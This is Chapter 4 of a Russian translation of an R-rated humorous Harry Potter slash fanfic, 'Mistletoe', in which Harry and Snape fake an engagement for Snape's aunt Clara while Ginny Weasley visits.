Mistletoe (Омела)

Автор: Forever then some
Перевод: Kirrsten
Бета: Laconic
Пейринг: ГП/СС
Категория: Слэш
Рейтинг: R
Жанр: Humor/Romance
Статус         закончен.
Disclaimer:  Эта история написана только для развлечения, а ни как не для получения прибыли.
Разрешение на перевод:  получено.
Оригинал: здесь

Глава 4

В полной тишине Гарри и Северус тщетно пытались придумать подходящее оправданией тишине пт, что-нибудь вроде «потому что на самом деле мы не помолвлены  и совершенно не выносим друг друга».

– Ну… Сейчас зима. А зимой невозможно достать подходящие цветы, – пробормотал Гарри, но данное утверждение не показалось убедительным даже ему самому.

– Вздор! Их можно купить в теплице! Мой Эйвери выращивал орхидеи даже в снежные бури.

Гарри хотел спросить, кто такой Эйвери, но прекрасно понимал, что сменить тему Клара не позволит.

– Мы не хотим искусственно выращенные, мне больше нравятся свежесобранные дикорастущие цветы.

Клара прищурилась:

– Найдем. Должны же где-нибудь в мире, в это время года расти такие цветы, а значит мы их достанем. Нет проблем. 

– Это должны быть английские цветы, – вмешался Северус. 

Тетушка недоверчиво посмотрела на него:

– Только так?

– Да. – Северус немного помолчал и добавил: – Используя родные английские цветы на церемонии, мы подтвердим обязательства не только друг перед другом, но и… перед нашей… страной.

Клара выгнула бровь:

– Как это?

Снейп оказался в ловушке. Она прекрасно видела, как бегают его глаза в поисках выхода. И понимая, что племянник запаниковал, Клара приободрилась – вот теперь он попался:

– Какая связь между патриотизмом и вашей свадьбой?

Северус трагически вздохнул:

Тетя Клара, если ты спрашиваешь об этом, значит, ты никогда не поймешь. 

– Я начинаю беспокоиться. Если ты не сможешь назвать существенную причину прямо сейчас, я буду вынуждена подумать, что её просто-напросто нет, и вы поженитесь в течение недели.

 

Способ оставался только один.  И Гарри очень не хотелось прибегать к нему. 

Поскольку придется пожертвовать собственным  достоинством.

И подвергнуть сомнению свое душевное здоровье.

 

– Мои родители! – весьма неожиданно заорал он, цепляясь за лежащую на диване подушку. – Мы не можем вступить в брак без моих родителей, они должны присутствовать!

– Гарри, дорогой, твои родители… они…

– Что с ними? – от легкой нервозности Гарри явно приближался к настоящей истерике. – Они в Кардиффе. Путешествуют!

Клара бросила на Северуса озабоченный взгляд «и-что-ты-собираешься-предпринять»?  Северус же просто наблюдал, неохотно признавая правдоподобность игры Поттера.

Когда племянник никак не отреагировал, Клара зашипела на него и с намеком кивнула в сторону Гарри.

Снейп только беззаботно пожал плечами:

– Не знаю, чего ты ждешь от меня, тетя. В таком состоянии он неуправляем.

– Попробуй хотя бы поговорить с ним об этом.

– Рассказать ему о его мертвых родителях? – громко засомневался Северус и услышал, как Гарри тут же начал задыхаться. Умный мальчик.

– Что?! Мои родители мертвы?..

– Именно. Мертвы, – трагически продолжил Северус. – Они никогда не вернутся. И, конечно, не приедут на нашу свадьбу.

– Северус! – испугалась Клара. – Как ты можешь так травмировать его?

– О, через минуту он придет в себя, если никто снова не заговорит с ним о его родителях и свадьбе.

– Нашей свадьбе? – успокоился Гарри. – Я очень хочу пригласить родителей. Они будут так гордиться мной, когда увидят, как ты поведешь меня к алтарю, Северус. В наших смокингах, гармонирующих с…

– Они мертвы, Гарри, – бесцеремонно прокомментировал Северус.

– ОНИ ЧТО? – завопил тот.

– Северус! – Клара рассерженно стукнула тростью.

Мертвы, Гарри. – Северус повернулся к тете и принялся объяснять: – Его врач советует прямо говорить всю правду, так будет лучше.

– Мама? Где моя мама? – взывал с дивана Поттер.

– Она мертва, Гарри.

– Не понимаю, не может быть…

– Но этот так, – абсолютно равнодушно отрезал Северус.

Клара попеременно смотрела на них:

– Я чувствую себя просто ужасно, я и не знала…

– Все нормально, тетя, он даже не вспомнит об этом. 

– Я хочу спать, – жалобно захныкал Гарри.

– Конечно, милый, – быстро согласилась Клара. – Иди, ложись.

– Я только….  чувствую такую слабость… – начал Гарри, и Северус был очень впечатлен, когда несколько крупных слезинок скатились по смуглым щекам. Но то, что он услышал дальше, впечатлило его намного меньше: – Северус, помоги мне, пожалуйста.

– Ты, должно быть, шутишь...

– Северус! Немедленно отнеси его в кровать!

– Не собираюсь я тащить его по лестнице! Он, наверняка, весит почти столько же, сколько и я!

– Неправда! – возмутился Поттер и забился в ложном припадке.

– Северус, да он же просто кости и кожа!

«Кожа, и кости, и тугие, гладкие мускулы», – хмуро думал Снейп, направляясь к Гарри. Вздыхая, затоптался рядом, затем потянул мальчишку за руку, поднимая. Придурок мягко съехал к его ногам. Северус зарычал,  испытывая искушение бросить мальчишку на пол.

Как будто читая его мысли, Гарри сладко протянул:

– Не отпуская меня, любимый.

– Может, в таком случае, ты пойдешь самостоятельно, любимый?

– Не-а, я чувствую себя в полной безопасности только в твоих объятиях, милый.

Выражение глаз Северуса подсказало Гарри, что он еще сегодня дорого заплатит за это. Но чувствовать, как пыхтит Северус под его весом – оно того стоило. 

Полчаса спустя оба были готовы ко сну. Гарри растянулся на животе на своей кровати, собирая маленькие катышки с шерстяного одеяла. Северус вышел из ванной и повесил полотенце  в шкаф. Обходя развалившегося на постели Гарри, он ясно расслышал вздох мальчика.

Гарри задумался о том, что нельзя ничего вернуть и исправить сегодняшний вечер, но… Нет! Это глупо.

– Что ты хотел сказать? – нетерпеливо пробормотал Снейп.

– Хм?

Что ты собирался сказать?

– С чего ты взял, что я хотел  что-то сказать?

– По твоему лицу заметно.

Гарри выгнул бровь:

– Ты так хорошо знаешь выражения моего лица?

– Невероятно, но факт. 

Гарри заглянул в темные глаза. Старший маг пристально смотрел на него тем самым, только ему присущим взглядом, способным, кажется, глубоко проникать в мысли. Или, возможно, профессор только пытался смутить его, ожидая, что молодой человек сдастся под давлением. 

И Гарри сдался:

– Она думает, что я не в себе?

– Поправь меня, если я ошибаюсь, но разве это не из-за твоего представления? Выглядело убедительно.

– Если она решила, что я спятил, она может быть против твоей женитьбы на мне, – Гарри вспыхнул, понимая, как смешно это звучит.

– И?.. Едва ли это имеет значение для нашей мистификации.

– Знаю, – Гарри перекатился на спину и прикрыл глаза рукой. – Я просто хочу, чтобы она сочла мою кандидатуру подходящей для женитьбы на её племяннике. Я хочу ей нравиться.

Северус откинул одеяла:

– Зачем?

– Она мне нравится. 

Профессор фыркнул и повернулся на другой бок, лицом к Гарри, все ещё прикрывающемуся рукой:

– Редко кто любит Клару.

– Ты любишь.

– Она – моя семья. Я вынужден её любить. Ты – нет.

– А я все равно люблю.

– Может быть. Но если она узнает, что ты на самом деле в порядке, то мы окажемся женаты к концу этой недели.

– Я только…

БУМ! БУМ!

Оба уставились на дверь.

– Мальчики, я могу войти? На минуточку.

Гарри мгновенно спрыгнул с кровати и трансфигурировал её назад в одеяла, зашвырнул их на кровать и уселся рядом с Северусом.

– Пожалуйста.

Вошла  Клара, одетая в серый шелковый халат и подходящие шлепанцы; ее волосы были накручены на бигуди и прикрыты серым шелковом платком.

– Я всего лишь хотела узнать, как ты.

– Спасибо, – быстро сказал Гарри. – Мне так жаль...

– Не нужно извиняться, дорогой, ты не виноват. Почему ты не в постели с Северусом? Тебе лучше находиться в тепле.

– Э... Хорошо, – покосившись на Снейпа, Гарри скользнул под одеяло. Против ожиданий,  старый, сбитый, жесткий на вид матрац оказался мягким, и теплым, и пах Северусом... на самом деле пах домашним знакомым запахом. 

– Так-то лучше, – одобрила Клара, приблизившись, чтобы поправить одеяла.

– Не прикасайся к одеялам, если не хочешь остаться без рук, – зарычал Снейп. – Я слишком стар для того, чтобы моя тетка укрывала меня!

– Хммм, – передумала Клара и двинулась к выходу. – Спокойной ночи, Гарри.

– Доброй ночи, Клара.

Она коротко кивнула племяннику и вышла.

Мужчины лежали тихо и неподвижно, вслушиваясь в звук удаляющихся шагов и скрип двери. Через несколько минут напряженной тишины, достаточной, чтобы убедиться, что Клара точно улеглась, Гарри обольстительно зашептал:

– Так удобно, верно?  Надеюсь, ты не скидываешь одеяла ночью?

Северус подумывал его придушить. Или трансфигурировать кляп... Он даже быстро рассмотрел идею заткнуть поцелуем эти ухмыляющиеся губы. Но, в конце концов, лишь просверлил мальчишку ледяным взглядом, поддерживая свою репутацию, и спокойно ответил, с приторной  сладостью в голосе:

– Если ты не уберешься из кровати прежде, чем я досчитаю до пяти,  прокляну тебя так, что потом останков не сыщешь.

– Ладья на F5, Гарри, F5! Давай, Северус, так. Отлично.

На следующий день после завтрака, Гарри и Северус устроились на противоположных концах дивана за шахматной доской и кучей сваленных между ними фигур.  Им одинаково везло в игре, главным образом потому, что не столько Гарри играл с Северусом, сколько Клара забавлялась, командуя обоими.

– Бей коня королевой, Гарри! 

– Но тогда…

– Королевой – коня!

Гарри неохотно двинул белую фигуру, забирая черного коня Северуса.

Он заметил самодовольство  в черных глазах прежде, чем мужчина забрал его собственную королеву.

– Нет, Северус, не королева! Ты добился бы большего успеха, переместив для защиты ладью на С3.

Северус улыбнулся:

– Лучше я заберу королеву Гарри и устрою шах! – и он убрал фигуру с доски.

– Нечестно! Клара велела тебе ходить ладьей!

– В каких правилах написано, что я должен поступать так, как она указывает?

– Это правила, по которым мы играем!  Я бы ни за что не пошел королевой, если бы Клара не настаивала!

– Тебе не повезло. Шах.

– Отдай назад мою королеву!

– Я взял её честно и открыто!

Клара смотрела на них поверх очков для чтения:

– Северус, ты поступаешь плохо. Гарри, дорогой, почему бы тебе не забрать её?

Гарри усмехнулся, наклоняясь вперед, и попробовал вырвать фигуру  из пальцев Северуса. Тот упорно не отпускал, отодвигаясь, пока Гарри не оказался наполовину на его коленях, наполовину на шахматной доске. Они продолжали сражаться за фигуру, но ни один не стремился выиграть по-настоящему.

Клара одобрительно улыбалась со своего стула.

Северус поднял фигурку над головой, заставляя Гарри скользить вверх по своей груди,  в тщетной попытке достать. Молодой человек со смехом пытался дотянуться до неё.

Во входную дверь кто-то постучал. Неловко стукнувшись головами, Гарри и Северус уставились друг на друга.

БУМ! БУМ! БУМ!

Тетушка с интересом посмотрела на обоих:

– Кто-нибудь собирается открыть?

– Мы никого не ждем на выходные, – спокойно отодвигаясь от Гарри, сказал Северус. – Наверное, кто-то попрошайничает. Уверен, они сейчас уйдут.

– Именно это ты и подумал, заставив ждать меня на снегу у дверей, когда я приехала? – припомнила ему Клара.

Удары стали громче.

Гарри поднялся с дивана и вопросительно взглянул на Снейпа. Но старший маг не мог ему помочь – только не под пристальным взором тети. Гарри подошел к двери и крикнул:

– Нам ничего не нужно!

Молчание.

Северус с облегчением выдохнул:

– Видишь, просто торговец какой-нибудь дребеденью.

– Гарри?.. Ты там?

Гарри вздрогнул, довольное выражение Северуса пропало.

Клара сложила руки на коленях:

– И как часто коммивояжеры зовут тебя по имени? Гарри, дорогой, твоя подруга, по-видимому, скоро совсем замерзнет. Может, ты её впустишь?

В последний раз беспомощно оглянувшись на Северуса, Гарри открыл дверь. В проем стремительно шагнула Джинни. Мелькнул яркий вихрь огненно-рыжих волос, темно-бордового плаща, фиолетовой шерстяной кепки, такого же шарфика и ярко-зеленых ботинок.

– Просто замечательно, Гарри, я чуть было не замерзла там!  Камин  заблокирован, внутрь я попасть не смогла... 

– Я правильно расслышала? Вы пробовали спуститься вниз по дымоходу, чтобы попасть внутрь? – озадаченно воскликнула Клара.

При звуках незнакомого голоса, Джинни резко развернулась, карие глаза  испугано распахнулись.

– Ммм, Клара, это моя подруга – Джинни Уизли. Джинни, позволь представить тебе тетю Северуса – Клару Снейп.

– Так вы пробовали войти через камин? – повторила Клара.

Через... – приступил к объяснениям Гарри. – Путь через... Мы так называем дорожку вокруг дома, до черного входа. Он недоступен, и через него войти нельзя. Там могут возникнуть кое-какие препятствия, путь довольно хитрый, но если знать, куда ступать, то следующий раз ты сможешь попасть сюда и через черный ход. Давай я тебе покажу? – нетерпеливо предложил Гарри, запихивая ноги в ботинки.  

Прежде чем кто-нибудь успел сказать хоть слово, Гарри выпихнул свою гостью на улицу и закрыл за собой дверь.

– Гарри?.. – Джинни спрятала заледеневшие руки в карманы длинного плаща. – Что, во имя Мерлина, происходит? Тетя Северуса?

– Что ты здесь делаешь?

– То есть как, что я здесь делаю? – удивленно переспросила Джинни. – Ты не приехал в Нору, зато прислал письмо, что останешься на несколько дней у Снейпа, без всяких объяснений. И ты ещё спрашиваешь, почему я приехала? – Гарри просто смотрел, пока она не продолжила: – Отлично, мама пробовала заставить нас сделать самодельные леденцы и игрушки для елки и собралась поделить семью на партии для восьмидесятой репетиции Jingle Bells, и все собрались там! Гарри, там воздуха не хватает даже для дыхания, не говоря уж о передвижениях... К тому же, знаешь, всем интересно, почему ты остался  здесь. Пожалуйста, Гарри, позвольте мне остаться с тобой  ненадолго... Клянусь, я с ума сойду, если ты отправишь меня назад прямо сейчас!

Гарри вздохнул:

– Я объясню тебе, но постарайся не реагировать слишком остро.

– Вольдеморт вернулся?

– Что?! Нет! С чего ты вообще ляпнула такое?

– Здравствуйте. Ты таинственно исчезаешь и проводишь отпуск со Снейпом и ещё спрашиваешь, почему я волнуюсь? Я решила назвать самый  худший вариант, в сравнении с которым все остальное, что бы ты не сказал потом, покажется ерундой. 

– Мы симулируем помолвку. – Джинни молча вылупилась на него. – Э-э-э? Джинни?

– Думаю, тебе лучше продолжить объяснение, Гарри.

– Та женщина на стуле – тетя Северуса. Маггла. Она думает, что Северус обручен, но это не так. Когда она появилась здесь перед Рождеством,  Северусу понадобился кто-то в качестве fiancé, чтобы она перестала его доставать.  

– А в чем дело? Почему бы Снейпу не сказать ей правду?

– Потому что она – настоящий дракон. И вряд ли оставит его в покое, пока не убедится, что он пристроен и счастлив.  

– Ты говоришь, что эта женщина…

– …Клара.

– Хорошо, Клара, может запугать Северуса Снейпа, Пожирателя Смерти,  Темного мага, совершенно потрясающего мерзавца?

– Определенно.

– Она старуха, Гарри, старая  маггла, как она может быть такой грозной?

 

О, Джинни! Просто, ооооох,  Джинни.

 

Джинни чувствовала себя  некомфортно и весьма смутно смогла вспомнить, когда испытывала подобное последний раз.

Ей было четыре с половиной.

Она выпустила в гостиной из коробки тарантулов Чарли, желая их немного развлечь. И думала, что это блестящая идея. В конце концов, они все время жили взаперти, в такой махонькой клетке. Но родители придерживались иного мнения.  Особенно после того, как на одного из тарантулов наткнулся Рон и, вереща, удрал назад в свою комнату и не выходил оттуда почти неделю.

Родители тогда усадили ее на диван, очень похожий на тот, на котором она сидела в данный момент, и неодобрительно нависали над ней, точно так же, как тетя Клара сейчас, заставляя чувствовать себя  ростом дюйма три от пола.

Гарри оставил ее одну. О, он не хотел, но дракон со стальным взглядом, в облике тети Клары,  настоял, чтобы Гарри принес Джинни угощение. И никакие заверения, что она не голодна, не помогли. Северус также загадочно пропал. И она осталась наедине с тростью Клары, чтобы подвергнуться допросу третьей степени...

– Как тебя зовут?

– Джинни Уизли.

– Сомневаюсь, что в твоем свидетельстве о рождении написано Джинни, девочка. Полное имя?

– Джиневра, – неохотно призналась Джинни. – Но никто меня так не называет. 

Джиневра. Очень странно. В каких ты отношениях с Гарри?

– Он – мой друг. Лучший друг моего младшего брата.

– И,  Джиневра, как долго вы знакомы?

– Я встретилась с ним незадолго до его поступления в школу, что-то около... тринадцати лет назад.

– Ты ходила в ту же школу, что и Гарри? Ту, где работал Северус?

– Да, мэм.  Я на год моложе Гарри.

– И как ты училась?

– Уммм?

– Быстро отвечай. Я не терплю ветреных молодых девчонок, уделяющих больше времени мальчишкам и моде, чем образованию.

– Я хорошо училась.

– Хрррм… фыф… Ты знаешь таблицу?

– Что?

– Таблицу умножения?

– Да… но… не понимаю, как это…

– На восемь, – Клара щелкнула тростью.

– Простите?

– Таблицу на восемь. Давай послушаем.

Джинни выглядела озадаченной:

– Вы хотите, чтобы я рассказала математическую таблицу?

– Ты сказала, что знаешь ее. Приступай. На восемь.

– Ммм… Восемь… шестнадцать…  двадцать четыре, тридцать два…

Гарри плечом толкнул дверь в комнату, так как руки были заняты подносом с чаем и бутербродами.

– Сорок… сорок восемь… пятьдесят шесть… ммм… семьдесят два…

– Джин, что ты делаешь?

Джинни бросила на него беспомощный взгляд, но остановиться не посмела:

– Восемьдесят, восемьдесят восемь, девяносто четыре, уммм… девяносто шесть, сто четыре…

Брови Гарри сошлись на переносице:

– Ты занимаешься математикой?

– Сто двенадцать, сто двадцать, сто двадцать восемь…

– Достаточно, – остановила Клара и посмотрела на Гарри: – Где Северус?

– Понятия не имею, – ответил молодой человек, вручая Джинни бутерброд. Он собирался сесть рядом с ней, но остановился, когда Клара стукнула тростью по полу.

– Найди его. А сейчас, Джиневра…

 

35 секунд спустя.

Не потребовалось много времени, чтобы найти мужчину в доме, где всего четыре комнаты.

 

Гарри открыл дверь в спальню Снейпа. Тот сидел на стуле у кровати с толстой пыльной книгой на коленях. При звуке открывающейся двери, он поднял голову.

– Уже избавился от Уизли? Думаю, Клара хочет, чтобы мы закончили шахматную партию, – с утомленным вздохом Северус встал и спрятал книгу на полку.

– Собственно, от Джинни я не избавился – она собирается ненадолго остаться здесь, – улыбнулся Гарри. – Но Клара действительно требует, чтобы ты спустился. Она становится сварливой, когда кто-то находится без её присмотра. И прямо сейчас она осталась с Джинни, так что нам нужно поспешить.

– Что? Она не может оставаться здесь, Поттер. ТЫ ХОЧЕШЬ, ЧТОБЫ КЛАРА ЗАПОДОЗРИЛА?..

Гарри выгнул бровь:

– Если ты не перестанешь кричать, Клара услышит и точно станет подозрительной.

– Плевать. Это мой дом, и я буду КРИЧАТЬ, если захочу. Я буду говорить, если пожелаю.  Я буду…

– Я понял.

Северус изобразил замысловатый жест:

– Иди и избавься от неё.

– Джинни мой гость. Она не пробудет здесь долго.

– Эту неделю ты работаешь на меня. И сделаешь, как я говорю.

– Это не работа, а одолжение.

– Взамен ты тоже кое-что получишь, поэтому я жду, что ты выполнишь свою часть сделки, действуя, как мой fiancé. А у моего fiancé не может быть подруги, навещающей его.

– У него был бы друг.

– Я не в настроении спорить, Поттер.

– Мерлин, это ненадолго, Сев. И она не проговорится. Джинни очень хорошая актриса, – добавил Гарри, протягивая руку. – Идем.

«И он осмелился?!» – Но вместо того, чтобы взорваться, услышав от Гарри сокращенную форму своего имени, Северус Снейп принял предложенную руку и спустился вслед за молодым человеком.

Когда они спустились, Гарри попытался незаметно освободить руку, но Северус сжал её ещё сильнее, повернулся и вежливо улыбнулся Джинни. Он чувствовал, как молодой человек пытается высвободиться, что вызвало у него змеиную улыбку:

– Мисс Уизли, очень рад вас видеть.

Джинни тоже улыбнулась ему:

– Спасибо. Я не могла побывать в отпуске и не навестить Гарри и вас, сэр.

– Пожалуйста, зовите меня Северус. Мы же не в школе.

Гарри  планировал сесть рядом с Джинни, но Снейп потянул его к стулу, недалеко от Клары. Он опустился на сиденье и дернул Гарри за руку вниз, вынуждая сесть на подлокотник.

– Итак, мисс Уизли, как проходит праздник в семье?

– Очень… празднично. Правда, довольно шумно…

– Сколько у тебя родных братьев,  Джиневра?

– Шесть старших: Билл, Чарли, Перси, Фред, Джордж и Рон. Рон, как я уже говорила, лучший друг Гарри. Кажется, он и будет вашим шафером, Гарри? – усмехаясь, добавила Джинни. – Ну, когда ты женишься на Снейпе…

Клара резко уставилась на Гарри, словно ожидая, что тот сейчас свалится. С чего бы это?.. Правда, именно это он и сделал, когда в прошлый раз упомянули свадьбу.

Джинни, однако, этого не знала. Она лишь беззлобно поддразнивала друга и наслаждалась этим:

– Где вы планируете играть свадьбу? В Хогвартсе? О, это было бы так романтично – место, где вы встретились.  Я уже вижу церемонию, подходящие смокинги и… АААУ!

– Трость? – спросил Гарри, изо всех сил сжимая губы в попытке скрыть ухмылку. – Она просто виртуозно владеет этой вещью.

Джинни в замешательстве отодвинулась в сторону.

Северус, не скрываясь, улыбался:

– Она терпеть не может, когда не участвует в беседе.

– Хфффф. Скажи мне, Джиневра, ты замужем?

Северус поймал странный взгляд Джинни, адресованный Поттеру, прежде чем она многозначительно ответила:

– Пока нет, но собираюсь.

Гарри ответил с непонятной страстностью:

– Уверен в этом, Джин. Когда ты что-то вбиваешь себе в голову, то добиваешься этого.

– Я хочу зал, полный роз, – продолжала с улыбкой Джинни.

Северус просто смотрел. Он с самого начала был уверен, что это будет цветочно и банально и совсем не во вкусе Гарри.

– Эйвери все время пытался научить меня выращивать розы, – вмешалась Клара, уголки ее губ приподнялись, глаза немного смягчились, озаряемые воспоминаниями. – У меня никогда не получалось. А он заполнил сад  цветущими кустами.

Гарри вспомнил, что она уже упоминала Эйвери прежде.

– А кто такой Эйвери?

– Мой садовник, – в голосе прозвучали новые интонации. – Но он не был обычным садовником.

– Был?..

Клара задумчиво кивнула:

– Он умер пятнадцать лет назад.

– Сожалею, – смутился Гарри.

– Не стоит. Он прожил хорошую, долгую жизнь, а теперь находится  в прекрасном месте, ожидая, когда наступит мое время.   

– Похоже, он был особенным, – тепло сказала Джинни.

– О, да.

– Особенно для вас, – рискнул Гарри. 

– Он был моим единственным. Я сразу это поняла. 

– И что делало его таким особенным?

– Он заставлял мои колени подгибаться,  – просто ответила Клара.

Джинни усмехнулась:

– Ваши колени?

Клара слегка придвинула трость к пальцам Джинни:

– Они подгибались каждый раз, когда он целовал меня.

– И поэтому вы уверены, что он – особенный? – с неподдельным интересом поинтересовался Гарри.

– Гарри, дорогой мой,  это единственная возможность определить!

– А что насчет вас, профессор? – осмелела Джинни. – Поцелуи Гарри заставляют ваши колени подгибаться?

– Надеюсь, нет, – фыркнул Северус. – Это, похоже, чисто женская проблема.

– Мерзавец, – проворчал Гарри, наклоняясь и толкая того локтем в плечо.

Когда Гарри наклонился совсем близко, Северус почувствовал запах его кожи и мог с уверенностью сказать, что тот сегодня утром пользовался его мылом.

Вопрос, почувствовала ли Уизли новый запах Гарри, был закономерным. Мысли о Джинни, ощущающей его запах на коже ее бойфренда, будоражили кровь.

Она волновалась? Сомневалась?.. О, он надеялся, что это так.

Гарри, Джинни и его тетя продолжали разговор. Но он не слышал ни слова. Он был слишком занят, мрачно спрашивая сам себя, заставляют ли поцелуи Гарри подгибаться колени Джинни Уизли?  

Он видел, с каким любопытством карие глаза следят за ними. Слишком назойливо. Но вместо того, чтобы встать и уйти, оставив их пялиться друг на друга телячьими глазами в обществе его тетки, он коснулся Гарри.

Легкое прикосновение: пальцы, скользнувшие по волосам, одна рука опустилась на бедро, другая похлопала по колену. Очень необычное поведение для человека, ненавидящего физический контакт и не выносящего публично милующиеся парочки... Но ещё более удивительной была реакция Гарри. Он не напрягся и не отодвинулся, и, кажется, действительно, не возражал. Кто позволил бы другому мужчине лапать себя перед своей же подругой?..

Уизли не сводила с них глаз, и это придало Северусу смелости. Его рука пробежалась по талии Гарри и приласкала волосы за ухом. Один раз он даже погладил Гарри по внутренней стороне бедра.

Это было довольно смешно, и он знал это: заявлять права на молодого человека, прекрасно понимая, что не обладает ими. Но еще смешнее было то, что яркая рыжеволосая красотка имела такое право.

Мерлин, совсем по-детски. Словно ему всего пять, и он размахивает любимым шарфом Джинни перед её лицом и дразнит: «Ха, ха, я отнял твою игрушку!» Но он ничего не мог поделать с собой. И не понимал почему.

Клара заметила скованность племянника, но наблюдала за развернувшейся сценой с отличным настроением и скрытой усмешкой.

 

В конце концов, Клара Снейп была необыкновенно проницательной женщиной.

Если кто-то и мог заметить, что Северус влюблен, то только она.

Даже раньше Северуса.

 

Должно быть, прошло уже часа два, когда Северус извинился и вышел на кухню, чтобы приготовить обед. Джинни тоже быстро поднялась с дивана. 

– Мне, наверное, пора, Гарри. Ты не проводишь меня?

– Конечно, – охотно поднялся Гарри.

– Уверена, девочка сама найдет дорогу, – с подозрением покосилась на них Клара.

– Всего одну минуту, – поспешил оправдаться Гарри, обуваясь и помогая Джинни надеть пальто.

Клара поочередно бросала нетерпеливые взгляды в сторону кухни и на них.

– Приятно было познакомиться, мисс Снейп, – вежливо сказала Джинни, открывая дверь.

– Разумеется, – фыркнула Клара, наблюдая за выходящим следом Гарри.

Как только они отошли достаточно далеко, чтобы их нельзя было увидеть из окна, Джинни, не тратя впустую время, устроила допрос:

– Что это было? Он тебя лапал.

– Да нет же, Джин. Ему просто нужно было продемонстрировать Кларе свою привязанность ко мне. Это – часть плана.

– Это не была демонстрация привязанности, Гарри. В один прекрасный момент я подумала, что он собирается залезть к тебе между ног.

Честно говоря, член Гарри думал также и испытывал определенные трудности. Сидеть на спинке стула в таком положении оказалось не очень удобно...

Джинни беспечно и ласково улыбалась, но в глазах светилось понимание.

– Все должно было выглядеть правдоподобно. Это просто часть игры.

– Правда? Ты способен заставить его подняться и опуститься по команде, Гарри? Очень правдоподобно. 

– Джинни! – Гарри покрылся стыдливым румянцем.

– Эй, ты влюбился в Снейпа?

– Не знаю, – наконец ответил Гарри. Лгать Джинни было бесполезно, она все равно выбьет из него правду. – Это так странно?

– Только лишь потому, что раньше вы никогда не интересовались друг другом. Я хочу сказать, что ты приглашал меня на свидания много лет, и это было все равно, как пригласить кузину на Святочный бал, но сейчас все не так, да?

– Надеюсь, ты никому не расскажешь.

– Ух ты, я знаю что-то, что неизвестно Гермионе и Рону? – злорадно засмеялась Джинни.

– Именно так, Джинни, никому.

– Ох, какой недоверчивый… Я могу сделать что-то ещё? Помочь подготовиться к…

– Нет. Ничего!

– Обещаю приложить все свои умения в помощь братцу…

– Джинни!

– Ладно, я ухожу. Но знай, я тебя одобряю.

– Почему? – с подозрением покосился на нее Гарри.

– Снейп поставил мне несколько незаслуженных PS на Зельях. Он должен заплатить. И я предчувствую, что ты именно тот человек, кто заставит его это сделать.

Клара уже нетерпеливо постукивала тростью, когда Северус, наконец, вернулся в гостиную.

– Что ты так долго? Гарри ушел с этой девчонкой.

– Хорошо, – сухо ответил Северус. – Мне нужно накрыть на стол.

– Они там одни. – Северус просто приподнял бровь. – Надо сказать Гарри, что ужин готов.

– Он придет, когда проводит свою гостью.

– Приведи его. Гарри должен быть здесь, с тобой, а не на холоде с… девицей. Он простудится.

Северус усмехнулся:

Тонко.

– Я никогда не намекаю тонко. Мужчины никогда ничего не понимают, если не сказать прямо.

– Даже твой собственный племянник?

Особенно мой собственный племянник.

– Можно подумать, я просил. 

– Ты, мой дорогой, практически вынудил меня.

Северус пошел к двери:

– Знаешь, тетя Клара, мисс Уизли – не девица. Она очень воспитанная, приятная молодая леди.

– Это, – взволнованно взмахнула тростью Клара, – делает её ещё более нежелательной!

Завязав шнурки, Северус накинул теплый черный плащ на плечи и вышел. Он не видел Гарри и Джинни, но услышал тихие голоса, звучащие с другой стороны дома, и двинулся туда.

Гарри, улыбаясь, с интересом смотрел на девушку:

– Так зачем ты на самом деле приехала? Я знаю, что не только из-за меня.

Джинни вздохнула и склонила голову, пиная ногой снежный наст:

– Гарри, это насчет мамы…  и нашей свадьбы. 

Северус помертвел и замер на месте. Он прислонился к стене, стараясь, чтобы его не заметили. Да, он знал, что не имеет права подслушивать. Но, услышав, что Джинни заговорила о свадьбе, не смог заставить себя уйти. Он оправдывал этот поступок привычкой шпионить.

– Ох, Джинни, – Гарри понял, что под этим «мы» Джинни подразумевала Драко Малфоя. Они решили пожениться весной. Артур и Молли, не говоря уже обо всех братьях, были категорически против. Вот почему Джинни так часто сопровождала Гарри на вечеринки и в Министерство, пробуя отвлечь внимание от своей связи с сыном одного из самых опасных Пожирателей. А Люциус даже из Азкабана сумел доставить семье Уизли и собственному сыну кучу проблем. 

– Гарри, мы любим друг друга.

– Знаю, – неохотно признал тот. Он знал, что Драко не плохой, что он рисковал жизнью в борьбе с Темным Лордом едва ли не чаще остальных, и что он действительно любит младшую Уизли. Но это вовсе не означало, что он достоин дышать одним с ней воздухом, не говоря уж о женитьбе. – Я просто хочу, чтобы ты была счастлива, Джин.

Северус содрогнулся. «Гарри, мы влюблены» «Я просто хочу, чтобы ты была счастлива, Джинни».

– Я не буду счастлива, Гарри, пока семья не одобрит мой брак и не примет моего мужа. 

– Разве не лучше, если это ты объяснишь им сама?

– Поговори с ними, Гарри! Тебя они послушают больше, чем меня! Они до сих пор считают меня маленькой девочкой.

– Не знаю, Джинни, какая-то часть их сомнений мне понятна... 

– Пожалуйста, Гарри. Ты единственный, на кого я могу рассчитывать. 

– Ты действительно этого хочешь? Замужество… Ты слишком быстро приняла решение… Это обязательство на всю жизнь.

– Да! Я хочу, Гарри. В радости и горести. Дом, детей, головную боль… Дикий секс в три утра по вторникам.

Гарри захихикал и тут же скривился:

– В таком случае, я приложу все усилия, чтобы обеспечить тебя всем этим!

Северус с силой вдавил ногти в ладони. Желчь поднялась в горле при мысли  о девчонке, способной разбудить Гарри посреди ночи для секса, и оттого, что они будут вместе всю жизнь.

– Спасибо, Гарри! – Джинни бросилась в его объятия. – Не знаю, как проживу без тебя ещё хотя бы день! Я тебя люблю! 

– Ты знаешь, что я тоже тебя люблю.

Целомудренно поцеловал друг друга на прощанье, они разошлись.

– Хотя бы день, Поттер?

Гарри резко выдохнул от удивления, когда сзади появился Северус. 

– Почему ты прячешься?

– Я делаю это лучше всего. Почему ты играешь в героя с мисс Уизли?

– Даже и не думал.

– Конечно, играешь. Это ты делаешь лучше всего. 

– Какова настоящая причина  твоего нежелания, чтобы  здесь присутствовала Джинни?

– Чем больше людей участвуют в нашей мистификации, тем больше шансов напортачить.

– Умоляю, Северус, я же знаю тебя… – усмехнулся Гарри.

– Ты не единственный, пребывающий в заблуждении, что знаешь меня, – отрезал Северус весьма опасным тоном.

Гарри хищно сузил глаза:

– И что это значит?

– Это значит, что ты всегда думал, что хорошо изучил меня за годы знакомства, но ты не единственный.

– Ага.

– Нужны доказательства? – голос понизился до зловещего мурлыканья. – Все, что я узнал о тебе, все подробности, ими можно заполнить книжную полку... 

– Северус, думаю, нам лучше…

– Помолчи, – длинный тонкий палец закрыл Гарри рот. – Сейчас моя очередь. Хоть раз выслушай, что о тебе думают другие.

– Если ты так хочешь, Северус… черт, как здесь холодно.

